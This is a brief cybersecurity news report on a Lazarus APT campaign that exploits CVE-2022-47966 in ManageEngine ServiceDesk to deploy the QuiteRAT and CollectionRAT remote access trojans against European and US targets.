HQ/EMEAFind out how we can help your business
The notorious North Korean state-sponsored threat group Lazarus APT has organised a new cybercriminal operation that targets internet providers and healthcare organisations in Europe and the United States.
Based on reports, this advanced persistent threat group started its attacks by exploiting a critical vulnerability within the ManageEngine ServiceDesk as early as January. The flaw in question is CVE-2022-47966.
The Lazarus APT group used the vulnerability as an entry point to its targets.
According to investigations, the Lazarus APT group employed the earlier-mentioned flaw to establish initial access to its targets. The exploiting prompts a malicious binary’s immediate download and operation through the Java runtime process. Hence, the attackers could start the implant on the infected servers.
The binary represents a modified variant of Lazarus’ MagicRAT malware called QuiteRAT. Additionally, the group has included a new malware dubbed CollectionRAT in this campaign. The new remote access trojan could execute arbitrary commands on an infected system.
Furthermore, separate research claimed a connection between EarlyRAT and Collection since the former is a malicious software previously linked to the Andriel APT faction, which operates under one of the subgroups of Lazarus.
Lazarus designed QuiteRAT via a Qt framework like MagicRAT. The actors used this open-source, cross-platform framework that could develop apps. It also includes features such as arbitrary command execution.
Researchers noticed that its file size is smaller since it only ranges from 4 to 5MB, opposite to its predecessor, MagicRAT, which has 18. However, the researchers also explained that the Lazarus group could have decided to include the essential Qt libraries into QuiteRAT, explaining its small file size.
Furthermore, QuiteRAT lacks inherent persistence functionality; instead, it relies on the command-and-control server to give it persistence instruction, opposite to MagicRAT, which integrates mechanisms for persistence by enabling the configuration of scheduled tasks.
Analysts claimed this is the third confirmed campaign that directly ties with the Lazarus group this year. This North Korean-backed APT group has consistently repurposed the same infrastructure for their operations.
Cybersecurity teams should track and study the threat to acquire prevention tactics against the newly discovered QuiteRAT.
